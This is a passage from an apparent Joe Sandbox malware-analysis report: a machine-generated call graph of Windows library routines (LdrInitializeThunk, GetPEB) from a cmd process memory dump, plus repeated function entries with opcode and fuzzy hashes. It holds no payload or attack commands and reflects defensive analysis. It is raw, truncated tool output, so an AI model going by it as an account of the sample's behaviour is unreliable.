3c1b640 15972->16015 15974 3c6fef8 15974->15939 15976 3c6fdff __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15975->15976 15977 3c65720 _vswprintf_s 11 API calls 15976->15977 15978 3c6fe0f 15977->15978 15979 3c65720 _vswprintf_s 11 API calls 15978->15979 15980 3c6fe39 15979->15980 15980->15939 15982 3c6ffc8 _vswprintf_s 15981->15982 16092 3c0e730 15982->16092 16103 3bdb171 15989->16103 15993 3c57052 15992->15993 15994 3c57073 GetPEB 15993->15994 15999 3c57084 15993->15999 15994->15999 15995 3c57125 GetPEB 15996 3c57136 15995->15996 15997 3c1b640 _vswprintf_s 11 API calls 15996->15997 15998 3c57147 15997->15998 15998->15952 15999->15996 16000 3bf7d50 GetPEB 15999->16000 16003 3c57101 _vswprintf_s 15999->16003 16001 3c570ec 16000->16001 16002 3c570f0 GetPEB 16001->16002 16001->16003 16002->16003 16003->15995 16003->15996 16004->15944 16005->15962 16007 3c016ed 16006->16007 16008 3c016f3 GetPEB 16007->16008 16009 3c016f1 16007->16009 16008->16009 16009->15966 16012 3c0a1a0 16010->16012 16013 3c0a192 16010->16013 16011 3c0a1b0 GetPEB 16014 3c0a1c1 16011->16014 16012->16011 16012->16013 16013->15967 16014->15967 16016 3c1b648 16015->16016 16017 3c1b64b 16015->16017 16016->15974 16020 3c8b590 16017->16020 16019 3c1b74a _vswprintf_s 16019->15974 16023 3c8b260 16020->16023 16022 3c8b5a3 16022->16019 16081 3c2d08c 16023->16081 16025 3c8b26c GetPEB 16026 3c8b279 GetPEB 16025->16026 16028 3c8b293 16026->16028 16029 3c8b2ba 16028->16029 16030 3c8b48b 16028->16030 16080 3c8b54b 16028->16080 16031 3c8b414 16029->16031 16032 3c8b2c6 16029->16032 16033 3c65720 _vswprintf_s 9 API calls 16030->16033 16036 3c65720 _vswprintf_s 9 API calls 16031->16036 16034 3c8b2ce 16032->16034 16042 3c8b32d 16032->16042 16035 3c8b49e 16033->16035 16038 3c8b2da 16034->16038 16039 3c8b2f3 16034->16039 16047 3c65720 _vswprintf_s 9 API calls 16035->16047 16040 3c8b427 16036->16040 16043 3c65720 _vswprintf_s 9 API calls 16038->16043 16045 3c65720 _vswprintf_s 9 API calls 16039->16045 16048 3c65720 _vswprintf_s 9 API calls 16040->16048 16041 3c8b396 16053 3c65720 _vswprintf_s 9 API calls 16041->16053 16042->16041 16046 3c8b2eb 16042->16046 16050 3c8b34d 16042->16050 16043->16046 16044 3c8b56b _vswprintf_s 16044->16022 16052 3c8b302 16045->16052 16051 3c65720 _vswprintf_s 9 API calls 16046->16051 16054 3c8b4c2 16047->16054 16049 3c8b43e 16048->16049 16057 3c65720 _vswprintf_s 9 API calls 16049->16057 16058 3c65720 _vswprintf_s 9 API calls 16050->16058 16059 3c8b4fd 16051->16059 16060 3c65720 _vswprintf_s 9 API calls 16052->16060 16055 3c8b3aa 16053->16055 16056 3c8b4cc 16054->16056 16064 3c8b320 16054->16064 16061 3c8b38f 16055->16061 16062 3c8b3b6 16055->16062 16063 3c65720 _vswprintf_s 9 API calls 16056->16063 16057->16064 16065 3c8b361 16058->16065 16066 3c8b519 16059->16066 16071 3c65720 _vswprintf_s 9 API calls 16059->16071 16067 3c8b311 16060->16067 16075 3c65720 _vswprintf_s 9 API calls 16061->16075 16068 3c65720 _vswprintf_s 9 API calls 16062->16068 16063->16046 16064->16046 16069 3c65720 _vswprintf_s 9 API calls 16064->16069 16065->16061 16070 3c8b371 16065->16070 16072 3c65720 _vswprintf_s 9 API calls 16066->16072 16073 3c65720 _vswprintf_s 9 API calls 16067->16073 16074 3c8b3c5 16068->16074 16069->16046 16078 3c65720 _vswprintf_s 9 API calls 16070->16078 16071->16066 16076 3c8b528 16072->16076 16073->16064 16077 3c65720 _vswprintf_s 9 API calls 16074->16077 16075->16046 16079 3c65720 _vswprintf_s 9 API calls 16076->16079 16076->16080 16077->16046 16078->16046 16079->16080 16080->16044 16082 3c60c30 16080->16082 16081->16025 16083 3c60c50 16082->16083 16091 3c60c49 16082->16091 16084 3c6193b _vswprintf_s LdrInitializeThunk 16083->16084 16085 3c60c5e 16084->16085 16086 3c61c76 _vswprintf_s LdrInitializeThunk 16085->16086 16085->16091 16087 3c60c70 16086->16087 16088 3c60fec _vswprintf_s 11 API calls 16087->16088 16089 3c60c91 16088->16089 16090 3c6193b _vswprintf_s LdrInitializeThunk 16089->16090 16090->16091 16091->16044 16098 3c19670 16092->16098 16100 3c1967a 16098->16100 16101 3c19681 16100->16101 16102 3c1968f LdrInitializeThunk 16100->16102 16104 3bdb180 _vswprintf_s 16103->16104 16105 3bdb1b0 GetPEB 16104->16105 16112 3bdb1c0 _vswprintf_s 16104->16112 16105->16112 16106 3c2d130 _vswprintf_s 9 API calls 16107 3bdb1de 16106->16107 16107->15939 16109 3c34904 GetPEB 16110 3bdb1d1 _vswprintf_s 16109->16110 16110->16106 16112->16109 16112->16110 16113 3c1e2d0 16112->16113 16116 3c1e2ed 16113->16116 16115 3c1e2e8 16115->16112 16117 3c1e2fb 16116->16117 16118 3c1e30f 16116->16118 16125 3c1b58e 16117->16125 16119 3c1e332 16118->16119 16121 3c1e31e 16118->16121 16130 3c22440 16119->16130 16122 3c1b58e _vswprintf_s 11 API calls 16121->16122 16124 3c1e307 _vswprintf_s 16122->16124 16124->16115 16126 3bdb150 _vswprintf_s 11 API calls 16125->16126 16127 3c1b627 16126->16127 16128 3c1b640 _vswprintf_s 11 API calls 16127->16128 16129 3c1b632 16128->16129 16129->16124 16131 3c2249a 16130->16131 16132 3c224af 16130->16132 16133 3c1b58e _vswprintf_s 11 API calls 16131->16133 16134 3c224b7 16132->16134 16141 3c224cc __aulldvrm _vswprintf_s 16132->16141 16136 3c224a4 16133->16136 16135 3c1b58e _vswprintf_s 11 API calls 16134->16135 16135->16136 16137 3c1b640 _vswprintf_s 11 API calls 16136->16137 16138 3c22d6e 16137->16138 16138->16124 16139 3c22d4f 16140 3c1b58e _vswprintf_s 11 API calls 16139->16140 16140->16136 16141->16136 16141->16139 16142 3c258ee 11 API calls __cftof 16141->16142 16142->16141 16144 3bd4dfa 16143->16144 16146 3bd4dd1 16143->16146 16145 3bd2e9f LdrInitializeThunk 16144->16145 16145->16146 16147 3bd4df3 16146->16147 16162 3bd4f2e 16146->16162 16147->15899 16147->16147 16215 3c2d0e8 16149->16215 16151 3c6ff1c GetPEB 16152 3c6ff43 GetPEB 16151->16152 16153 3c6ff2b 16151->16153 16155 3c6ff6e 16152->16155 16156 3c6ff4f 16152->16156 16153->16152 16154 3c6ffb1 16153->16154 16157 3c2d130 _vswprintf_s 11 API calls 16154->16157 16159 3c0e730 2 API calls 16155->16159 16158 3c65720 _vswprintf_s 11 API calls 16156->16158 16160 3c6ffb6 16157->16160 16158->16155 16161 3c6ff7d 16159->16161 16160->15902 16161->15902 16163 3c30b85 16162->16163 16168 3bd4f3e 16162->16168 16164 3c30b8b GetPEB 16163->16164 16165 3c30b9a 16163->16165 16164->16165 16166 3c30b9f 16164->16166 16171 3ca88f5 16165->16171 16168->16163 16169 3bd4f5b GetPEB 16168->16169 16169->16163 16170 3bd4f6e 16169->16170 16170->16147 16172 3ca8901 _vswprintf_s 16171->16172 16177 3bdcc50 16172->16177 16174 3ca891f 16175 3c2d130 _vswprintf_s 11 API calls 16174->16175 16176 3ca8946 16175->16176 16176->16166 16181 3bdcc79 16177->16181 16178 3bdcc7e 16179 3c1b640 _vswprintf_s 11 API calls 16178->16179 16180 3bdcc89 16179->16180 16180->16174 16181->16178 16183 3c0b230 16181->16183 16184 3c4a2f6 16183->16184 16185 3c0b26a 16183->16185 16185->16184 16186 3c4a2fd 16185->16186 16187 3c0b2ab _vswprintf_s 16185->16187 16192 3c0b2b5 16186->16192 16201 3ca5ba5 16186->16201 16187->16192 16193 3bdccc0 16187->16193 16188 3c1b640 _vswprintf_s 11 API calls 16189 3c0b2d0 16188->16189 16189->16178 16192->16184 16192->16188 16194 3bdcd04 16193->16194 16200 3bdcd95 16194->16200 16211 3bdb150 16194->16211 16197 3bdb150 _vswprintf_s 11 API calls 16198 3c34e14 16197->16198 16199 3bdb150 _vswprintf_s 11 API calls 16198->16199 16199->16200 16200->16192 16202 3ca5bb4 _vswprintf_s 16201->16202 16204 3ca4c56 11 API calls 16202->16204 16206 3ca5c2a _vswprintf_s 16202->16206 16208 3ca5c10 16202->16208 16203 3c2d130 _vswprintf_s 11 API calls 16205 3ca63e5 16203->16205 16204->16206 16205->16192 16206->16208 16209 3c16de6 31 API calls 16206->16209 16210 3ca60cf GetPEB 16206->16210 16214 3c19710 LdrInitializeThunk 16206->16214 16208->16203 16209->16206 16210->16206 16212 3bdb171 _vswprintf_s 11 API calls 16211->16212 16213 3bdb16e 16212->16213 16213->16197 16214->16206 16215->16151 16216 3c0fab0 16217 3c0fac2 16216->16217 16218 3c0fb14 16216->16218 16219 3beeef0 26 API calls 16217->16219 16220 3c0facd 16219->16220 16221 3c0fadf 16220->16221 16223 3c0fb18 16220->16223 16222 3beeb70 32 API calls 16221->16222 16224 3c0faf1 16222->16224 16232 3c4bdcb 16223->16232 16252 3be6d90 16223->16252 16224->16218 16225 3c0fafa GetPEB 16224->16225 16225->16218 16226 3c0fb09 16225->16226 16262 3beff60 16226->16262 16230 3c4bea7 16231 3be76e2 GetPEB 16230->16231 16251 3c0fc4b 16230->16251 16231->16251 16232->16230 16234 3bdb150 _vswprintf_s 11 API calls 16232->16234 16235 3c4be19 16232->16235 16233 3c0fba7 16237 3c0fbe4 16233->16237 16233->16251 16270 3c0fd22 16233->16270 16234->16235 16235->16230 16282 3be75ce 16235->16282 16239 3c4bf17 16237->16239 16240 3c0fc47 16237->16240 16237->16251 16241 3c0fd22 GetPEB 16239->16241 16239->16251 16242 3c0fd22 GetPEB 16240->16242 16240->16251 16244 3c4bf22 16241->16244 16245 3c0fcb2 16242->16245 16243 3c4be54 16246 3c4be92 16243->16246 16243->16251 16286 3be76e2 16243->16286 16247 3c0fd9b 3 API calls 16244->16247 16244->16251 16245->16251 16274 3c0fd9b 16245->16274 16246->16230 16250 3be76e2 GetPEB 16246->16250 16247->16251 16250->16230 16253 3be6dba 16252->16253 16255 3be6da4 16252->16255 16290 3c12e1c 16253->16290 16255->16232 16255->16233 16255->16251 16256 3be6dbf 16257 3beeef0 26 API calls 16256->16257 16258 3be6dca 16257->16258 16259 3be6dde 16258->16259 16295 3bddb60 16258->16295 16260 3beeb70 32 API calls 16259->16260 16260->16255 16263 3beff6d 16262->16263 16264 3beff99 16262->16264 16263->16264 16266 3beff80 GetPEB 16263->16266 16265 3ca88f5 32 API calls 16264->16265 16267 3beff94 16265->16267 16266->16264 16268 3beff8f 16266->16268 16267->16218 16407 3bf0050 16268->16407 16271 3c0fd31 _vswprintf_s 16270->16271 16272 3c0fd3a 16270->16272 16271->16237 16272->16271 16441 3be7608 16272->16441 16275 3c0fdba GetPEB 16274->16275 16277 3c0fdcc 16274->16277 16275->16277 16276 3c4c0bd 16280 3c4c0d3 GetPEB 16276->16280 16281 3c0fdfc 16276->16281 16277->16276 16278 3c0fdf2 16277->16278 16277->16281 16279 3be76e2 GetPEB 16278->16279 16278->16281 16279->16281 16280->16281 16281->16251 16283 3be75db 16282->16283 16285 3be75eb 16282->16285 16284 3be7608 GetPEB 16283->16284 16283->16285 16284->16285 16285->16243 16287 3be76fd 16286->16287 16288 3be76e6 16286->16288 16287->16246 16288->16287 16289 3be76ec GetPEB 16288->16289 16289->16287 16291 3c12e32 16290->16291 16292 3c12e57 16291->16292 16303 3c19840 LdrInitializeThunk 16291->16303 16292->16256 16294 3c4df2e 16296 3bddb6d 16295->16296 16302 3bddb91 16295->16302 16296->16302 16304 3bddb40 GetPEB 16296->16304 16298 3bddb76 16298->16302 16306 3bde7b0 16298->16306 16300 3bddb87 16301 3c34fa6 GetPEB 16300->16301 16300->16302 16301->16302 16302->16259 16303->16294 16305 3bddb52 16304->16305 16305->16298 16307 3bde7e0 16306->16307 16308 3bde7ce 16306->16308 16309 3bde7e8 16307->16309 16311 3bdb150 _vswprintf_s 11 API calls 16307->16311 16308->16309 16314 3be3d34 16308->16314 16313 3bde7f6 16309->16313 16353 3bddca4 16309->16353 16311->16309 16313->16300 16315 3c38213 16314->16315 16316 3be3d6c 16314->16316 16319 3c3822b GetPEB 16315->16319 16340 3be4068 16315->16340 16369 3be1b8f 16316->16369 16318 3be3d81 16318->16315 16320 3be3d89 16318->16320 16319->16340 16321 3be1b8f 2 API calls 16320->16321 16322 3be3d9e 16321->16322 16323 3be3dba 16322->16323 16324 3be3da2 GetPEB 16322->16324 16325 3be1b8f 2 API calls 16323->16325 16324->16323 16326 3be3dd2 16325->16326 16327 3be3e91 16326->16327 16329 3be3deb GetPEB 16326->16329 16326->16340 16330 3be1b8f 2 API calls 16327->16330 16328 3c38344 GetPEB 16332 3be407a 16328->16332 16346 3be3dfc _vswprintf_s 16329->16346 16333 3be3ea9 16330->16333 16331 3be4085 16331->16307 16332->16331 16334 3c38363 GetPEB 16332->16334 16335 3be3f6a 16333->16335 16336 3be3ec2 GetPEB 16333->16336 16333->16340 16334->16331 16337 3be1b8f 2 API calls 16335->16337 16350 3be3ed3 _vswprintf_s 16336->16350 16338 3be3f82 16337->16338 16339 3be3f9b GetPEB 16338->16339 16338->16340 16352 3be3fac _vswprintf_s 16339->16352 16340->16328 16340->16332 16341 3be3e74 16341->16327 16343 3be3e81 GetPEB 16341->16343 16342 3be3e62 GetPEB 16342->16341 16343->16327 16344 3be3f3b GetPEB 16345 3be3f4d 16344->16345 16345->16335 16347 3be3f5a GetPEB 16345->16347 16346->16340 16346->16341 16346->16342 16347->16335 16348 3be404f 16348->16340 16351 3be4058 GetPEB 16348->16351 16349 3c38324 GetPEB 16349->16340 16350->16340 16350->16344 16350->16345 16351->16340 16352->16340 16352->16348 16352->16349 16356 3bddcfd 16353->16356 16367 3bddd6f _vswprintf_s 16353->16367 16354 3bddd47 16384 3bddbb1 16354->16384 16356->16354 16363 3bddfc2 16356->16363 16375 3bde620 16356->16375 16357 3c34ff2 16357->16357 16362 3bddfae 16362->16363 16397 3c195d0 LdrInitializeThunk 16362->16397 16364 3c1b640 _vswprintf_s 11 API calls 16363->16364 16366 3bddfe4 16364->16366 16366->16313 16367->16357 16367->16362 16367->16363 16391 3bde375 16367->16391 16396 3c195d0 LdrInitializeThunk 16367->16396 16373 3be1ba9 _vswprintf_s 16369->16373 16374 3be1c05 16369->16374 16370 3c3701a GetPEB 16371 3be1c21 16370->16371 16371->16318 16372 3be1bf4 GetPEB 16372->16374 16373->16371 16373->16372 16373->16374 16374->16370 16374->16371 16376 3c35503 16375->16376 16377 3bde644 16375->16377 16377->16376 16398 3bdf358 16377->16398 16379 3bde661 _vswprintf_s 16380 3bde725 16379->16380 16402 3c195d0 LdrInitializeThunk 16379->16402 16381 3bde729 GetPEB 16380->16381 16383 3bde73b 16380->16383 16381->16383 16383->16354 16403 3be766d 16384->16403 16386 3bddbcf 16386->16367 16387 3bddbf1 16386->16387 16388 3bddc05 16387->16388 16389 3be766d GetPEB 16388->16389 16390 3bddc22 16389->16390 16390->16367 16395 3bde3a3 16391->16395 16392 3c1b640 _vswprintf_s 11 API calls 16393 3bde400 16392->16393 16393->16367 16394 3c35306 16395->16392 16395->16394 16396->16367 16397->16363 16399 3bdf370 16398->16399 16400 3bdf38c 16399->16400 16401 3bdf379 GetPEB 16399->16401 16400->16379 16401->16400 16402->16380 16405 3be7687 16403->16405 16404 3be76d3 16404->16386 16405->16404 16406 3be76c2 GetPEB 16405->16406 16406->16404 16408 3bf0074 16407->16408 16409 3bf009d GetPEB 16408->16409 16410 3bf00ef 16408->16410 16411 3c3c01b 16409->16411 16412 3bf00d0 16409->16412 16413 3c1b640 _vswprintf_s 11 API calls 16410->16413 16411->16412 16414 3c3c024 GetPEB 16411->16414 16416 3bf00df 16412->16416 16417 3c3c037 16412->16417 16415 3bf0105 16413->16415 16414->16412 16415->16267 16421 3c09702 16416->16421 16425 3ca8a62 16417->16425 16420 3c3c04b 16420->16420 16423 3c09720 16421->16423 16424 3c09784 16423->16424 16432 3ca8214 16423->16432 16424->16410 16426 3bf7d50 GetPEB 16425->16426 16427 3ca8a9d 16426->16427 16428 3ca8aa1 GetPEB 16427->16428 16429 3ca8ab1 _vswprintf_s 16427->16429 16428->16429 16430 3c1b640 _vswprintf_s 11 API calls 16429->16430 16431 3ca8ad7 16430->16431 16431->16420 16434 3ca823b 16432->16434 16433 3ca82c0 16433->16424 16434->16433 16436 3c03b7a GetPEB 16434->16436 16440 3c03bb5 _vswprintf_s 16436->16440 16437 3c46298 16438 3c03c1b GetPEB 16439 3c03c35 16438->16439 16439->16433 16440->16437 16440->16438 16440->16440 16442 3be7620 16441->16442 16443 3be766d GetPEB 16442->16443 16444 3be7632 16443->16444 16444->16271 16561 3c135b1 16562 3c135ca 16561->16562 16563 3c135f2 16561->16563 16562->16563 16564 3be7608 GetPEB 16562->16564 16564->16563 16447 3c19670 16448 3c1967a _vswprintf_s LdrInitializeThunk 16447->16448 16565 3bd1e04 16566 3bd1e10 _vswprintf_s 16565->16566 16569 3bd1e37 _vswprintf_s 16566->16569 16570 3c9a80d 16566->16570 16571 3c9a81c 16570->16571 16572 3c2f18b 16570->16572 16574 3c8ff41 16571->16574 16575 3c8ff4d _vswprintf_s 16574->16575 16577 3c8ffaf _vswprintf_s 16575->16577 16578 3c92073 16575->16578 16577->16572 16588 3c8fd22 16578->16588 16580 3c9207d 16581 3c92085 16580->16581 16582 3c920a4 16580->16582 16583 3c88df1 12 API calls 16581->16583 16587 3c920be 16582->16587 16591 3c91c06 GetPEB 16582->16591 16584 3c920a2 16583->16584 16584->16577 16587->16577 16589 3c19670 _vswprintf_s LdrInitializeThunk 16588->16589 16590 3c8fd3d 16589->16590 16590->16580 16592 3c91c3d 16591->16592 16593 3c91c20 GetPEB 16591->16593 16595 3bdb150 _vswprintf_s 11 API calls 16592->16595 16594 3bdb150 _vswprintf_s 11 API calls 16593->16594 16596 3c91c3a 16594->16596 16595->16596 16597 3bdb150 _vswprintf_s 11 API calls 16596->16597 16598 3c91c5a GetPEB 16597->16598 16600 3c91d04 16598->16600 16601 3c91ce7 GetPEB 16598->16601 16603 3bdb150 _vswprintf_s 11 API calls 16600->16603 16602 3bdb150 _vswprintf_s 11 API calls 16601->16602 16604 3c91d01 16602->16604 16603->16604 16605 3bdb150 _vswprintf_s 11 API calls 16604->16605 16606 3c91d1c 16605->16606 16607 3c91d27 GetPEB 16606->16607 16636 3c91d66 16606->16636 16609 3c91d4f 16607->16609 16610 3c91d32 GetPEB 16607->16610 16608 3c91d70 GetPEB 16613 3c91d98 16608->16613 16614 3c91d7b GetPEB 16608->16614 16612 3bdb150 _vswprintf_s 11 API calls 16609->16612 16611 3bdb150 _vswprintf_s 11 API calls 16610->16611 16620 3c91d4c 16611->16620 16612->16620 16619 3bdb150 _vswprintf_s 11 API calls 16613->16619 16617 3bdb150 _vswprintf_s 11 API calls 16614->16617 16615 3c91db9 GetPEB 16621 3c91de1 16615->16621 16622 3c91dc4 GetPEB 16615->16622 16616 3c91df8 16618 3c91e0a GetPEB 16616->16618 16624 3c91e52 GetPEB 16616->16624 16628 3c91d95 16617->16628 16625 3c91e32 16618->16625 16626 3c91e15 GetPEB 16618->16626 16619->16628 16627 3bdb150 _vswprintf_s 11 API calls 16620->16627 16623 3bdb150 _vswprintf_s 11 API calls 16621->16623 16629 3bdb150 _vswprintf_s 11 API calls 16622->16629 16632 3c91dde 16623->16632 16630 3c91e7a 16624->16630 16631 3c91e5d GetPEB 16624->16631 16635 3bdb150 _vswprintf_s 11 API calls 16625->16635 16633 3bdb150 _vswprintf_s 11 API calls 16626->16633 16627->16636 16634 3bdb150 _vswprintf_s 11 API calls 16628->16634 16629->16632 16640 3bdb150 _vswprintf_s 11 API calls 16630->16640 16639 3bdb150 _vswprintf_s 11 API calls 16631->16639 16637 3bdb150 _vswprintf_s 11 API calls 16632->16637 16638 3c91e2f 16633->16638 16641 3c91daf 16634->16641 16635->16638 16636->16608 16636->16641 16637->16616 16643 3bdb150 _vswprintf_s 11 API calls 16638->16643 16642 3c91e77 16639->16642 16640->16642 16641->16615 16641->16616 16645 3bdb150 _vswprintf_s 11 API calls 16642->16645 16644 3c91e4f 16643->16644 16644->16624 16646 3c91e90 GetPEB 16645->16646 16646->16587 16647 3bd9240 16648 3bd924c _vswprintf_s 16647->16648 16649 3bd925f 16648->16649 16665 3c195d0 LdrInitializeThunk 16648->16665 16666 3bd9335 16649->16666 16653 3bd9335 LdrInitializeThunk 16654 3bd9276 16653->16654 16671 3c195d0 LdrInitializeThunk 16654->16671 16656 3bd927e GetPEB 16657 3bf77f0 16656->16657 16658 3bd929a GetPEB 16657->16658 16659 3bf77f0 16658->16659 16660 3bd92b6 GetPEB 16659->16660 16661 3bd92d2 16660->16661 16662 3bd9330 16661->16662 16663 3bd9305 GetPEB 16661->16663 16664 3bd931f _vswprintf_s 16663->16664 16665->16649 16672 3c195d0 LdrInitializeThunk 16666->16672 16668 3bd9342 16673 3c195d0 LdrInitializeThunk 16668->16673 16670 3bd926b 16670->16653 16671->16656 16672->16668 16673->16670

                                                                                                                                          Executed Functions

                                                                                                                                          Function 03C19A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 15 3c19a50-3c19a5c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 6280f5b28d2d0912554c171488f97169ce877ef9112aa7332edaa9e085619f03
                                                                                                                                          • Instruction ID: 8df242a0ad3691e8c6218337a402c5dd0ddf8ef2c109f183aa9b47fe8b5fa7fd
                                                                                                                                          • Opcode Fuzzy Hash: 6280f5b28d2d0912554c171488f97169ce877ef9112aa7332edaa9e085619f03
                                                                                                                                          • Instruction Fuzzy Hash: 679002A121185542D201A5694C18B07150597E0353F71C115A425C554CCA5588616561
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 14 3c19a20-3c19a2c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 7368042eb800728b69ed4ebe996175f75617f4a0bf10bb3b4d696c8f1d83c288
                                                                                                                                          • Instruction ID: 4766837dd8e028288ae1df074b3aa295cad637f64cc7afaf06a4dc9f2857d34e
                                                                                                                                          • Opcode Fuzzy Hash: 7368042eb800728b69ed4ebe996175f75617f4a0bf10bb3b4d696c8f1d83c288
                                                                                                                                          • Instruction Fuzzy Hash: A39002A1601055424141B16988489065505BBF1261771C121A4A9C550D8699886566A5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C199A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 13 3c199a0-3c199ac LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 8c623ca73b3f83ded619869a39751c5e8be29da42df80f05381c4970780414e0
                                                                                                                                          • Instruction ID: 4fc684ad29a8381bc8988a5d0bda9f1a1a6b6e27ffb5443fb01a0edce7c5ba70
                                                                                                                                          • Opcode Fuzzy Hash: 8c623ca73b3f83ded619869a39751c5e8be29da42df80f05381c4970780414e0
                                                                                                                                          • Instruction Fuzzy Hash: 329002E134105942D101A1594418B061505D7F1351F71C015E516C554D8759CC527166
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 12 3c19910-3c1991c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: edd522a88c827389073b971f44c038aae02345f77c46dee66072ce6b123daa89
                                                                                                                                          • Instruction ID: b00e39245929733e701c6a7af8a671c278e88806931feaf04763c637380a25de
                                                                                                                                          • Opcode Fuzzy Hash: edd522a88c827389073b971f44c038aae02345f77c46dee66072ce6b123daa89
                                                                                                                                          • Instruction Fuzzy Hash: D69002F120105902D141B1594408746150597E0351F71C011A916C554E87998DD576A5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 10 3c19840-3c1984c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: cf777f1b378954d3e9fa82f0081e9ad32c9303594e7db6dd2fdf2ddcf7794a7a
                                                                                                                                          • Instruction ID: d454b0c1dc181eaefb97ac7b5b12c009a246815b22f257364e588aa5b4cbdf3e
                                                                                                                                          • Opcode Fuzzy Hash: cf777f1b378954d3e9fa82f0081e9ad32c9303594e7db6dd2fdf2ddcf7794a7a
                                                                                                                                          • Instruction Fuzzy Hash: 809002A1242096525546F15944085075506A7F02917B1C012A551C950C86669856E661
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 11 3c19860-3c1986c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 09f04839653570ea28f6648953e23c7c1f68778a4ff502ce290f32120feeda6c
                                                                                                                                          • Instruction ID: 0c76cfa390be23b77a0b8001421d30c3cc69078de5e9a739574ecd7de2f2ebaa
                                                                                                                                          • Opcode Fuzzy Hash: 09f04839653570ea28f6648953e23c7c1f68778a4ff502ce290f32120feeda6c
                                                                                                                                          • Instruction Fuzzy Hash: C59002B120105913D112A1594508707150997E0291FB1C412A452C558D97968952B161
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
